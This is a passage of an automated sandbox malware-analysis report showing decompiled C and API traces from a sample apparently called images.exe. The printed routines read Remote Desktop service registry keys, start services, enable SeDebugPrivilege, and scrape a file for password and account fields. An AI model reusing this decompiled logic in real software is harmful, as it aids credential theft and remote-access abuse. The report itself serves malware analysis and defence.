                                      0x0043c44d
                                      0x0043c452
                                      0x0043c454
                                      0x0043c479
                                      0x0043c47b
                                      0x0043c47e
                                      0x0043c480
                                      0x0043c482
                                      0x0043c484
                                      0x0043c486
                                      0x0043c489
                                      0x0043c499
                                      0x0043c4a3
                                      0x0043c4a8
                                      0x0043c4ac
                                      0x0043c4b4
                                      0x0043c4b5
                                      0x0043c4b9
                                      0x0043c4b9
                                      0x0043c4bd
                                      0x0043c4c8
                                      0x0043c4d2
                                      0x0043c4dc
                                      0x0043c4e1
                                      0x0043c4e5
                                      0x0043c4ef
                                      0x0043c4f2
                                      0x0043c4f7
                                      0x0043c4f9
                                      0x0043c529
                                      0x0043c52e
                                      0x0043c531
                                      0x0043c537
                                      0x0043c537
                                      0x0043c552
                                      0x0043c55b
                                      0x0043c561
                                      0x0043c569
                                      0x0043c4fb
                                      0x0043c4fe
                                      0x0043c502
                                      0x0043c503
                                      0x00000000
                                      0x0043c503
                                      0x0043c456
                                      0x0043c45a
                                      0x0043c462
                                      0x0043c466
                                      0x0043c467
                                      0x00000000
                                      0x0043c467
                                      0x0043c432
                                      0x0043c436
                                      0x0043c43e
                                      0x0043c442
                                      0x0043c443
                                      0x00000000
                                      0x0043c443
                                      0x0043c3e7
                                      0x0043c3eb
                                      0x0043c3f3
                                      0x0043c3f7
                                      0x0043c3f8
                                      0x00000000
                                      0x0043c3f8
                                      0x0043c3c3
                                      0x0043c3c7
                                      0x0043c3cf
                                      0x0043c3d3
                                      0x0043c3d4
                                      0x0043c505
                                      0x0043c512
                                      0x0043c51b
                                      0x0043c521
                                      0x0043c521
                                      0x0043c338
                                      0x0043c33d
                                      0x0043c346
                                      0x0043c34b
                                      0x0043c358
                                      0x0043c35d
                                      0x0043c361
                                      0x0043c373
                                      0x0043c377
                                      0x0043c37c
                                      0x0043c37e
                                      0x0043c380
                                      0x0043c38a
                                      0x0043c393
                                      0x0043c393
                                      0x0043c39c
                                      0x0043c3a5
                                      0x00000000
                                      0x0043c363
                                      0x0043c367
                                      0x00000000
                                      0x0043c367
                                      0x0043c361
                                      0x0043c29c
                                      0x0043c2a1
                                      0x0043c2aa
                                      0x0043c2af
                                      0x0043c2b4
                                      0x0043c2ba
                                      0x0043c2be
                                      0x0043c2c4
                                      0x0043c2c0
                                      0x0043c2c0
                                      0x0043c2c0
                                      0x0043c2c6
                                      0x0043c2c9
                                      0x0043c2d4
                                      0x0043c2d9
                                      0x0043c2dd
                                      0x0043c2e2
                                      0x0043c2e6
                                      0x0043c2fb
                                      0x0043c304
                                      0x0043c306
                                      0x0043c308
                                      0x0043c312
                                      0x0043c31b
                                      0x0043c31b
                                      0x0043c320
                                      0x0043c324
                                      0x00000000
                                      0x0043c2e8
                                      0x0043c2e8
                                      0x0043c2ec
                                      0x0043c2f1
                                      0x0043c2f1
                                      0x0043c2e6
                                      0x0043c56e
                                      0x0043c57b

                                      APIs
                                      • EnterCriticalSection.KERNEL32 ref: 0043C270
                                        • Part of subcall function 0043DBF3: GetCurrentProcess.KERNEL32(?,?,00432BBD,?,00442608,?,?,00000000,?,?,?), ref: 0043DBF7
                                      • PathFileExistsW.SHLWAPI(?), ref: 0043C32E
                                      • PathFileExistsW.SHLWAPI(?), ref: 0043C28E
                                        • Part of subcall function 0043DD8E: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 0043DDA5
                                        • Part of subcall function 0043DD8E: GetLastError.KERNEL32(?,?,?,00438715,?,?,?), ref: 0043DDB3
                                      • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0043C521
                                        • Part of subcall function 0043BD37: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0043BD6B
                                      • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0043C414
                                      • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0043C561
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 1717069549-2896544425
                                      • Opcode ID: 159dcffcbe95a75f28a8f3b731b6dfe39667b667e1ace2084f2b51e8fa40d3ff
                                      • Instruction ID: 262d24cc0eab0ce5121a57b3a987b939ebcdac3cfa305bec0a34172509e949f2
                                      • Opcode Fuzzy Hash: 159dcffcbe95a75f28a8f3b731b6dfe39667b667e1ace2084f2b51e8fa40d3ff
                                      • Instruction Fuzzy Hash: 2D915271504205ABD705FF62DC92DAFB3A8BF9C308F40252FF55292191DB68E909CB9A
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0043C033(void* __ecx, void* __edx) {
                                      				void* _v8;
                                      				WCHAR* _v12;
                                      				signed int _v16;
                                      				short* _v20;
                                      				short* _v24;
                                      				char _v28;
                                      				int _v32;
                                      				char _v36;
                                      				void* _t50;
                                      				void* _t62;
                                      				void* _t72;
                                      				void* _t96;
                                      
                                      				_t96 = __edx;
                                      				_t72 = __ecx;
                                      				_v8 = 0;
                                      				E00433412( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
                                      				E00433412( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                      				_v36 = 0;
                                      				_v32 = 0;
                                      				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
                                      					_t50 = E0043EF61( &_v8, _t96, E00433412( &_v16, L"ImagePath"),  &_v36);
                                      					E00435A2D(_v16);
                                      					E0043EF4C( &_v8);
                                      					_t103 = _t50;
                                      					if(_t50 != 0) {
                                      						E00432D08( &_v36, _t103,  &_v12);
                                      						E00432DF3( &_v36);
                                      						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
                                      							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
                                      								_t62 = E0043EF61( &_v8, _t96, E00433412( &_v16, L"ServiceDll"),  &_v36);
                                      								E00435A2D(_v16);
                                      								_t107 = _t62;
                                      								if(_t62 != 0) {
                                      									E00433264(_t72 + 0x20, E00433001( &_v16, E00432D08( &_v36, _t107,  &_v28), _t107));
                                      									E00435A2D(_v16);
                                      									_v16 = _v16 & 0x00000000;
                                      									E00435A2D(_v28);
                                      								}
                                      								E0043EF4C( &_v8);
                                      							}
                                      						}
                                      						E00435A2D(_v12);
                                      						_v12 = _v12 & 0x00000000;
                                      					}
                                      				}
                                      				E00432E66( &_v36);
                                      				E00435A2D(_v20);
                                      				E00435A2D(_v24);
                                      				return E0043EF4C( &_v8);
                                      			}

                                      APIs
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 0043C074
                                        • Part of subcall function 0043EF61: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0043F3B9,?,0000000A,80000001), ref: 0043EF84
                                        • Part of subcall function 0043EF61: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,0043F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043EFA7
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043EF4C: RegCloseKey.ADVAPI32(?,?,0043F043,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0043EF56
                                      • StrStrW.SHLWAPI(?,svchost.exe), ref: 0043C0D8
                                      • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0043C0E6
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0043C103
                                      Strings
                                      • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0043C03F
                                      • ImagePath, xrefs: 0043C086
                                      • ServiceDll, xrefs: 0043C111
                                      • svchost.exe -k, xrefs: 0043C0DE
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C04F
                                      • svchost.exe, xrefs: 0043C0D0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Similarity
                                      • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                      • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                      • API String ID: 2246401353-3333427388
                                      • Opcode ID: 917052dcec4ed8a73080977068f02011d923592ec58fc08fd87e55eed1be189e
                                      • Instruction ID: f3b52ece0c05f811827ad19d4e8af4e78ff1b780f453cb3f31f5c0b3daa028e2
                                      • Opcode Fuzzy Hash: 917052dcec4ed8a73080977068f02011d923592ec58fc08fd87e55eed1be189e
                                      • Instruction Fuzzy Hash: B5415E71D00118BBDF14EFA2DD92AEEB778AF18705F10516AB501B21A2EB785F04DB98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0043B889(short** _a4) {
                                      				void* _t2;
                                      				int _t8;
                                      				void* _t13;
                                      				int _t15;
                                      				void* _t17;
                                      
                                      				_t15 = 0;
                                      				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
                                      				_t17 = _t2;
                                      				if(_t17 != 0) {
                                      					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
                                      					if(_t13 != 0) {
                                      						if(StartServiceW(_t13, 0, 0) != 0) {
                                      							L6:
                                      							_t15 = 1;
                                      							L7:
                                      							CloseServiceHandle(_t17);
                                      							CloseServiceHandle(_t13);
                                      							_t8 = _t15;
                                      							L8:
                                      							return _t8;
                                      						}
                                      						if(GetLastError() != 0x420) {
                                      							goto L7;
                                      						}
                                      						Sleep(0x7d0);
                                      						if(StartServiceW(_t13, 0, 0) == 0) {
                                      							goto L7;
                                      						}
                                      						goto L6;
                                      					}
                                      					CloseServiceHandle(_t17);
                                      					_t8 = 0;
                                      					goto L8;
                                      				}
                                      				return _t2;
                                      			}

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0043B898
                                      • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0043B8AD
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B8BA
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0043B8C7
                                      • GetLastError.KERNEL32 ref: 0043B8D1
                                      • Sleep.KERNEL32(000007D0), ref: 0043B8E3
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0043B8EC
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B900
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B903
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Similarity
                                      • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                      • String ID: ServicesActive
                                      • API String ID: 104619213-3071072050
                                      • Opcode ID: 1bb9bee44d4bb98d7e731547fa4d10bc11bdf62a352061a982a8b90ad434c243
                                      • Instruction ID: 148525303a5555431b5f00f8c58d608aace881056db08435528ddb96ea91cbf1
                                      • Opcode Fuzzy Hash: 1bb9bee44d4bb98d7e731547fa4d10bc11bdf62a352061a982a8b90ad434c243
                                      • Instruction Fuzzy Hash: D1018F753016147BD3252B66AE4DF5B3EACDFCAB61F401032F702D6251DBA8C801C6B8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 97%
                                      			E0043878B(intOrPtr __ecx, CHAR* _a4) {
                                      				char _v12;
                                      				long _v16;
                                      				void* _v20;
                                      				long _v24;
                                      				intOrPtr _v28;
                                      				void* _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				char _v44;
                                      				char _v48;
                                      				char _v52;
                                      				char _t96;
                                      				void* _t101;
                                      				char _t103;
                                      				void* _t124;
                                      				intOrPtr _t126;
                                      				char _t127;
                                      				long _t132;
                                      				void* _t134;
                                      				void* _t141;
                                      				void* _t145;
                                      				void* _t146;
                                      				intOrPtr* _t163;
                                      				intOrPtr* _t165;
                                      				void* _t166;
                                      				void* _t167;
                                      				void* _t168;
                                      				void* _t170;
                                      				intOrPtr _t171;
                                      				intOrPtr* _t172;
                                      				void* _t173;
                                      				intOrPtr _t174;
                                      				intOrPtr* _t176;
                                      				CHAR* _t177;
                                      				void* _t178;
                                      				void* _t179;
                                      
                                      				_v36 = __ecx;
                                      				_t173 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
                                      				if(_t173 != 0xffffffff) {
                                      					_t132 = GetFileSize(_t173, 0);
                                      					_v16 = _t132;
                                      					_t170 = E00435ADB(_t132);
                                      					_v32 = _t170;
                                      					E00431052(_t170, 0, _t132);
                                      					_v24 = _v24 & 0x00000000;
                                      					_t179 = _t178 + 0xc;
                                      					ReadFile(_t173, _t170, _t132,  &_v24, 0);
                                      					CloseHandle(_t173);
                                      					_t174 = E00435A3C(0x400000);
                                      					_v28 = _t174;
                                      					_a4 = E00435A3C(0x104);
                                      					_t96 = E00435A3C(0x104);
                                      					_t141 = 0;
                                      					_v12 = _t96;
                                      					_t134 = 0;
                                      					__eflags = _v16;
                                      					if(_v16 <= 0) {
                                      						L36:
                                      						E00435A2D(_a4);
                                      						E00435A2D(_v12);
                                      						return E00435A2D(_t174);
                                      					} else {
                                      						goto L3;
                                      					}
                                      					do {
                                      						L3:
                                      						_t165 =  *((intOrPtr*)(_t134 + _t170));
                                      						_t13 = _t165 - 0x21; // -33
                                      						__eflags = _t13 - 0x5d;
                                      						if(_t13 > 0x5d) {
                                      							goto L28;
                                      						}
                                      						__eflags = _t165 - 0x3d;
                                      						if(_t165 == 0x3d) {
                                      							goto L28;
                                      						}
                                      						 *((char*)(_t141 + _t174)) = _t165;
                                      						_t141 = _t141 + 1;
                                      						__eflags = _t165;
                                      						if(_t165 != 0) {
                                      							__eflags =  *((char*)(_t141 + _t174 - 8)) - 0x50;
                                      							if( *((char*)(_t141 + _t174 - 8)) != 0x50) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 7)) - 0x61;
                                      							if( *((char*)(_t141 + _t174 - 7)) != 0x61) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 6)) - 0x73;
                                      							if( *((char*)(_t141 + _t174 - 6)) != 0x73) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 5)) - 0x73;
                                      							if( *((char*)(_t141 + _t174 - 5)) != 0x73) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 4)) - 0x77;
                                      							if( *((char*)(_t141 + _t174 - 4)) != 0x77) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 3)) - 0x6f;
                                      							if( *((char*)(_t141 + _t174 - 3)) != 0x6f) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 2)) - 0x72;
                                      							if( *((char*)(_t141 + _t174 - 2)) != 0x72) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 1)) - 0x64;
                                      							if( *((char*)(_t141 + _t174 - 1)) == 0x64) {
                                      								__eflags =  *_t170 - 0xd0;
                                      								_t101 = 2;
                                      								_t145 = 9;
                                      								_t102 =  !=  ? _t145 : _t101;
                                      								_t146 = ( !=  ? _t145 : _t101) + _t134;
                                      								_t103 =  *((intOrPtr*)(_t146 + _t170));
                                      								_t166 = 0;
                                      								__eflags = _t103 - 0x20;
                                      								if(_t103 <= 0x20) {
                                      									L35:
                                      									_t60 =  &_v12; // 0x50
                                      									_v52 = 0;
                                      									_v48 = 0;
                                      									 *((char*)(_t166 +  *_t60)) = 0;
                                      									_v44 = 0;
                                      									E004331EC( &_v20,  *_t60);
                                      									_t66 =  &_a4; // 0x50
                                      									E004331EC( &_v16,  *_t66);
                                      									E00433264( &_v44, E00432ECA( &_v20, __eflags,  &_v32));
                                      									E00435A2D(_v32);
                                      									E00433264( &_v48, E00432ECA( &_v16, __eflags,  &_v32));
                                      									E00435A2D(_v32);
                                      									_v40 = 5;
                                      									E00433264( &_v52, E00433412( &_v32, 0x442608));
                                      									E00435A2D(_v32);
                                      									E00431EB9(_t179 - 0x10,  &_v52);
                                      									E00431EEF(_v36);
                                      									E00435A2D(_v16);
                                      									E00435A2D(_v20);
                                      									E0043138F( &_v52);
                                      									goto L36;
                                      								}
                                      								_t163 = _t146 + _t170;
                                      								__eflags = _t163;
                                      								_t58 =  &_v12; // 0x50
                                      								_t171 =  *_t58;
                                      								while(1) {
                                      									__eflags = _t103 - 0x7f;
                                      									if(_t103 >= 0x7f) {
                                      										goto L35;
                                      									}
                                      									__eflags = _t103 - 0x21;
                                      									if(_t103 == 0x21) {
                                      										goto L35;
                                      									}
                                      									 *((char*)(_t166 + _t171)) = _t103;
                                      									_t166 = _t166 + 1;
                                      									_t163 = _t163 + 1;
                                      									_t103 =  *_t163;
                                      									__eflags = _t103 - 0x20;
                                      									if(_t103 > 0x20) {
                                      										continue;
                                      									}
                                      									goto L35;
                                      								}
                                      								goto L35;
                                      							}
                                      							goto L28;
                                      						}
                                      						__eflags = _t141 - 7;
                                      						if(_t141 <= 7) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 7)) - 0x41;
                                      						if( *((char*)(_t141 + _t174 - 7)) != 0x41) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 6)) - 0x63;
                                      						if( *((char*)(_t141 + _t174 - 6)) != 0x63) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 5)) - 0x63;
                                      						if( *((char*)(_t141 + _t174 - 5)) != 0x63) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 4)) - 0x6f;
                                      						if( *((char*)(_t141 + _t174 - 4)) != 0x6f) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 3)) - 0x75;
                                      						if( *((char*)(_t141 + _t174 - 3)) != 0x75) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 2)) - 0x6e;
                                      						if( *((char*)(_t141 + _t174 - 2)) != 0x6e) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 1)) - 0x74;
                                      						if( *((char*)(_t141 + _t174 - 1)) != 0x74) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *_t170 - 0xd0;
                                      						_t124 = 2;
                                      						_t167 = 9;
                                      						_t125 =  !=  ? _t167 : _t124;
                                      						_t168 = 0;
                                      						_t126 = ( !=  ? _t167 : _t124) + _t134;
                                      						_v20 = _t126;
                                      						_t127 =  *((intOrPtr*)(_t126 + _t170));
                                      						__eflags = _t127 - 0x20;
                                      						if(_t127 <= 0x20) {
                                      							L19:
                                      							 *((char*)(_t168 + _a4)) = 0;
                                      							goto L28;
                                      						}
                                      						_t176 = _v20 + _t170;
                                      						__eflags = _t176;
                                      						_v20 = _t176;
                                      						_t172 = _t176;
                                      						_t177 = _a4;
                                      						while(1) {
                                      							__eflags = _t127 - 0x7f;
                                      							if(_t127 >= 0x7f) {
                                      								break;
                                      							}
                                      							_t172 = _t172 + 1;
                                      							 *((char*)(_t168 + _t177)) = _t127;
                                      							_t168 = _t168 + 1;
                                      							_t127 =  *_t172;
                                      							__eflags = _t127 - 0x20;
                                      							if(_t127 > 0x20) {
                                      								continue;
                                      							}
                                      							break;
                                      						}
                                      						_t174 = _v28;
                                      						_t170 = _v32;
                                      						goto L19;
                                      						L28:
                                      						_t134 = _t134 + 1;
                                      						__eflags = _t134 - _v16;
                                      					} while (_t134 < _v16);
                                      					goto L36;
                                      				}
                                      				GetLastError();
                                      				return CloseHandle(_t173);
                                      			}
                                      0x0043895a
                                      0x0043895a
                                      0x0043895c
                                      0x0043895c
                                      0x0043895f
                                      0x0043895f
                                      0x00438961
                                      0x00000000
                                      0x00000000
                                      0x00438963
                                      0x00438965
                                      0x00000000
                                      0x00000000
                                      0x00438967
                                      0x0043896a
                                      0x0043896b
                                      0x0043896c
                                      0x0043896e
                                      0x00438970
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00438970
                                      0x00000000
                                      0x0043895f
                                      0x00000000
                                      0x0043892f
                                      0x00438860
                                      0x00438863
                                      0x00000000
                                      0x00000000
                                      0x00438869
                                      0x0043886e
                                      0x00000000
                                      0x00000000
                                      0x00438874
                                      0x00438879
                                      0x00000000
                                      0x00000000
                                      0x0043887f
                                      0x00438884
                                      0x00000000
                                      0x00000000
                                      0x0043888a
                                      0x0043888f
                                      0x00000000
                                      0x00000000
                                      0x00438895
                                      0x0043889a
                                      0x00000000
                                      0x00000000
                                      0x004388a0
                                      0x004388a5
                                      0x00000000
                                      0x00000000
                                      0x004388ab
                                      0x004388b0
                                      0x00000000
                                      0x00000000
                                      0x004388b2
                                      0x004388b7
                                      0x004388ba
                                      0x004388bb
                                      0x004388be
                                      0x004388c0
                                      0x004388c2
                                      0x004388c5
                                      0x004388c8
                                      0x004388ca
                                      0x004388ee
                                      0x004388f1
                                      0x00000000
                                      0x004388f5
                                      0x004388cf
                                      0x004388cf
                                      0x004388d1
                                      0x004388d4
                                      0x004388d6
                                      0x004388d9
                                      0x004388d9
                                      0x004388db
                                      0x00000000
                                      0x00000000
                                      0x004388dd
                                      0x004388de
                                      0x004388e1
                                      0x004388e2
                                      0x004388e4
                                      0x004388e6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004388e6
                                      0x004388e8
                                      0x004388eb
                                      0x00000000
                                      0x00438931
                                      0x00438931
                                      0x00438932
                                      0x00438932
                                      0x00000000
                                      0x0043893b
                                      0x004387b5
                                      0x00000000

                                      APIs
                                      • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004387A8
                                      • GetLastError.KERNEL32 ref: 004387B5
                                      • CloseHandle.KERNEL32(00000000), ref: 004387BC
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004387C9
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004387F9
                                      • CloseHandle.KERNEL32(00000000), ref: 00438800
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateErrorLastReadSize
                                      • String ID: C:\ProgramData\images.exe$Password$Password
                                      • API String ID: 1366138817-953739094
                                      • Opcode ID: cbfc450604d6d786c809085f07dab544e447a438ca923115f256b86b5c013bd3
                                      • Instruction ID: 2216169cff0355ab1a3aae9a18d441cff0bd6bfcc24076f45493d414e9791ca5
                                      • Opcode Fuzzy Hash: cbfc450604d6d786c809085f07dab544e447a438ca923115f256b86b5c013bd3
                                      • Instruction Fuzzy Hash: A38125B0D042446EEF20EBA5C891BBEBB65AF19318F50506FF042572A2CBBD4D46C759
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0043D7C0
                                      • CoInitialize.OLE32(00000000), ref: 0043D7C7
                                      • CoCreateInstance.OLE32(00442460,00000000,00000017,00444330,?), ref: 0043D7E5
                                      • VariantInit.OLEAUT32(?), ref: 0043D869
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Initialize$CreateInitInstanceSecurityVariant
                                      • String ID: I+C$Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                      • API String ID: 2382742315-751697490
                                      • Opcode ID: 2f78ab773517b02c65b44bc9c880b6d0fd79923aaad6743984c8994fff237778
                                      • Instruction ID: 17e6a66b553c7ed42e54899f5c330e6219d0f592a15652b472809ac324868797
                                      • Opcode Fuzzy Hash: 2f78ab773517b02c65b44bc9c880b6d0fd79923aaad6743984c8994fff237778
                                      • Instruction Fuzzy Hash: 6A41F970A00209ABDB14DF95CC48EAFBBB8FFCAB15F104499F515EB290DB74A905CB64
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      • _free.LIBCMT ref: 00CC76AF
                                        • Part of subcall function 00CC628A: HeapFree.KERNEL32(00000000,00000000), ref: 00CC62A0
                                        • Part of subcall function 00CC628A: GetLastError.KERNEL32(?,?,00CC98A8,?,00000000,?,00000000,?,00CC98CF,?,00000007,?,?,00CC9CD3,?,?), ref: 00CC62B2
                                      • _free.LIBCMT ref: 00CC76BB
                                      • _free.LIBCMT ref: 00CC76C6
                                      • _free.LIBCMT ref: 00CC76D1
                                      • _free.LIBCMT ref: 00CC76DC
                                      • _free.LIBCMT ref: 00CC76E7
                                      • _free.LIBCMT ref: 00CC76F2
                                      • _free.LIBCMT ref: 00CC76FD
                                      • _free.LIBCMT ref: 00CC7708
                                      • _free.LIBCMT ref: 00CC7716
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 0cb41f9d21b498956cda43d494d1636b2a13cc2743eb420c67f53474d54964e2
